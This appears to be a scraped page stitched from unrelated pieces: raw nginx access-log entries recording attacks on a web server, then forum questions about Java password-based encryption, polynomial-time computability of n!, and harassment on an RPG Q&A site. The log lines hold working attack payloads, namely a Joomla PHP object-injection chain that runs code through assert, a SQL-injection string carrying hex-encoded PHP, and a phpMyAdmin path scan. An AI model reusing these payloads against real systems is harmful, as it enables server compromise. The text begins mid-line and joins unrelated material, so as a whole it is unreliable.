Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:12 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:56:\x22die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD, 218.75.30.86" [23/Mar/2020:03:29:13 +0000] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 301 178 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\x22id\x22;s:3:\x22'/*\x22;s:3:\x22num\x22;s:141:\x22*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log 5 —

[23/Mar/2020:03:29:13 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:14 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:14 +0000] "GET /pmd/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:14 +0000] "GET /pma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /PMA/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /PMA2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /pmamy/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /pmamy2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /mysql/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /db/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /dbadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:17 +0000] "GET /web/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; 

Securely encrypt and decrypt files via PBE in Java (Jasypt seems insecure)

Requirements:

  • I have a Java app, which among other things, needs to encrypt/decrypt binary files on the file system. I’m planning to use PBE (password based encryption) since the password will be entered by the user each time they use the app (it’s not stored anywhere).
  • I don’t know if AWS KMS (key management system) or Google KMS can assist in any way, but it doesn’t matter since remote services are not allowed to be used for this project.

My Questions:

  • Are there any Java libraries that will help me achieve my requirements, aside from directly interacting with the JCE API (java cryptography extension)? I’m not a security expert and don’t want to misuse the JCE.
  • I’m also open to other ideas that don’t use a Java library, however, it must nicely integrate with my primary Java application.

Google Tink:

Tink doesn’t support PBE.

The lead developer of Tink (Thai Duong) has stated as such. Thai does say it is possible to achieve using an internal API (AesGcmJce.java), however, he goes on: “This is not recommended because the subtle layer might change without notice”. I want a stable solution, so Tink doesn’t cut it.

There is an open GitHub issue to add PBE to Tink.


Jasypt:

Jasypt doesn’t seem secure.

If you want to know the details, read on, but it’s not required…

Jasypt is supposed to make PBE tasks easier, and the API is very simple, but the default parameter values it uses seem to be those which have proven insecure (e.g., MD5 and DES). I can manually configure it to use more secure options, but the very fact that its defaults are insecure makes me wonder what other aspects of the library are insecure.

For example, here are its default values when using the API:

  • Encryption algorithm: PBEWithMD5AndDES
  • No IV generator
  • Random salt generator of 64 bits using SHA1PRNG (java.security.SecureRandom)
  • KDF using MD5 with 1000 iterations

I can manually change the defaults to obtain the following configuration:

  • Encryption algorithm: PBEWITHSHA256AND256BITAES-CBC-BC
  • Random IV generator of 128 bits using SHA1PRNG (java.security.SecureRandom)
  • Random salt generator of 128 bits using SHA1PRNG (java.security.SecureRandom)
  • KDF using SHA256 with 1000 iterations

The API is super simple. Here’s how to instantiate the Java object which encrypts and decrypts binary data using the default settings (PBEWithMD5AndDES, etc):

    StandardPBEByteEncryptor binaryEncryptor = new StandardPBEByteEncryptor();
    binaryEncryptor.setPassword(password);
    byte[] cipherBytes = binaryEncryptor.encrypt(plainBytesArray);

In order to make things more secure I installed a lib called Bouncy Castle which adds many cipher algorithms for use by the JVM. Among the many options I chose PBEWITHSHA256AND256BITAES-CBC-BC. Similar to the code above, here’s how I instantiated the more secure configuration:

    StandardPBEByteEncryptor binaryEncryptor = new StandardPBEByteEncryptor();
    binaryEncryptor.setPassword(password);
    binaryEncryptor.setProvider(new BouncyCastleProvider());
    binaryEncryptor.setAlgorithm("PBEWITHSHA256AND256BITAES-CBC-BC");
    binaryEncryptor.setIvGenerator(new RandomIvGenerator());
    binaryEncryptor.setSaltGenerator(new RandomSaltGenerator());
    byte[] cipherBytes = binaryEncryptor.encrypt(plainBytesArray);

The library does have its own “stronger” encryptor classes (StrongBinaryEncryptor, AES256BinaryEncryptor, etc) but like I said, I’ve lost confidence in their software (unless you can explain otherwise).


Help:

Please help 🙂
thx

Argument in proving that function is not polynomial time in bit length of input seems faulty

I am currently solving a question that asks which of the following functions can be calculated in polynomial time:

$$n!, \binom{n}{5}, \binom{2n}{n}, n^{\lfloor \lg n \rfloor}, \lfloor \sqrt{n} \rfloor, \text{the smallest prime factor of } n, \text{the number of prime factors less than } n.$$

In proving the first one, I thought $n! \geq n$ and the input size is $\log_2 n$ so the output cannot even be written in polynomial time. So then clearly the calculation cannot be done in polynomial time.

But then I thought I must have some misunderstanding, since by that logic even just calculating $n$ from the input (that is, the identity function) should not be polynomial time. But that’s clearly not possible.

What is the problem in my thinking, and instead how should I be thinking about these?

How do I stop a “more senior” user, that seems to dislike my logic, from harassing every answer I give on StackExchange-RPG [migrated]

How do I stop a “more senior” user, that seems to dislike my logic, from harassing every answer I give on StackExchange-RPG?

I’m starting to feel very pushed away by certain user(s), who seem to enjoy claiming “I can’t follow your logic”

Insinuating I’m “stupid” & trying to push me away from explaining my logic with thinly veiled “pokes”

Is there an effective way to have it dealt with other than burning this account and making a new “fake-user” to escape them?

Most of the issues are interpretations of RAW in DnD_5e